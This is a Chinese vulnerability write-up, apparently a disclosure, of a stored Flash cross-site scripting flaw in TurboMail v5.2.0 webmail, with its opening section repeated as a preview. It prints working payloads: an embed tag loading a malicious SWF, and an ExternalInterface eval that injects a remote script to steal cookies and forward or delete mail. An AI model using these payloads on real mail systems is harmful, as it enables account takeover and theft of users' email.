VULHUB ™

### 简要描述： 邮件系统对邮件内容过滤不严格，导致存储型跨站。 ### 详细说明： 1、TurboMail邮件系统对邮件内容过滤不严格，导致存储型FLASH跨站，打开邮件即可触发漏洞，由于FLASH文件可以执行javascript代码，所以我们可以利用此漏洞进行盗取用户信息、用户邮件、钓鱼、修改用户设置、转发邮件等操作。 涉及版本v5.2.0 ### 漏洞证明： TurboMail下载地址：http://www.turbomail.org/download.html 测试浏览器：Firefox29.0.1、Chrome33.0.1750.149 m 1、写邮件，使用代理对请求进行拦截，本次使用burp suite，修改htmlbody字段值(即邮件内容)，如下图所示： [<img src="https://images.seebug.org/upload/201405/301515585dac5387121afc19f5e78632a1f1a1b4.png" alt="mail1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/301515585dac5387121afc19f5e78632a1f1a1b4.png) 嵌入的恶意代码解码后的内容为： <embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src="http://127.0.0.1/xss.swf"></embed> xss.swf内的脚本代码为：getURL("javascript:alert(document.cookie)"); 2、用户打开邮件，漏洞触发： [<img src="https://images.seebug.org/upload/201405/30151712b3cdba950d7c3448d1fbda1dd2b42028.png" alt="mail2.png"...

### 简要描述： 邮件系统对邮件内容过滤不严格，导致存储型跨站。 ### 详细说明： 1、TurboMail邮件系统对邮件内容过滤不严格，导致存储型FLASH跨站，打开邮件即可触发漏洞，由于FLASH文件可以执行javascript代码，所以我们可以利用此漏洞进行盗取用户信息、用户邮件、钓鱼、修改用户设置、转发邮件等操作。 涉及版本v5.2.0 ### 漏洞证明： TurboMail下载地址：http://www.turbomail.org/download.html 测试浏览器：Firefox29.0.1、Chrome33.0.1750.149 m 1、写邮件，使用代理对请求进行拦截，本次使用burp suite，修改htmlbody字段值(即邮件内容)，如下图所示： [<img src="https://images.seebug.org/upload/201405/301515585dac5387121afc19f5e78632a1f1a1b4.png" alt="mail1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/301515585dac5387121afc19f5e78632a1f1a1b4.png) 嵌入的恶意代码解码后的内容为： <embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src="http://127.0.0.1/xss.swf"></embed> xss.swf内的脚本代码为：getURL("javascript:alert(document.cookie)"); 2、用户打开邮件，漏洞触发： [<img src="https://images.seebug.org/upload/201405/30151712b3cdba950d7c3448d1fbda1dd2b42028.png" alt="mail2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/30151712b3cdba950d7c3448d1fbda1dd2b42028.png) 3、使用Firebug查看页面源代码： [<img src="https://images.seebug.org/upload/201405/30151743a8181c1a54a9f0ce4e15f0fb755fdaa8.png" alt="mail3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/30151743a8181c1a54a9f0ce4e15f0fb755fdaa8.png) flash文件成功插入，且允许执行脚本代码 4、修改xss.swf文件内容， import flash.external.ExternalInterface; ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);");//使用ExternalInterface.call()函数加载本地脚本文件，通过修改本地脚本文件内容我们可以进行盗取用户信息、用户邮件、钓鱼，编写蠕虫等操作。 通过修改eXploit.js文件内容，我们可以进行盗取cookie，转发邮件、删除用户邮件等操作。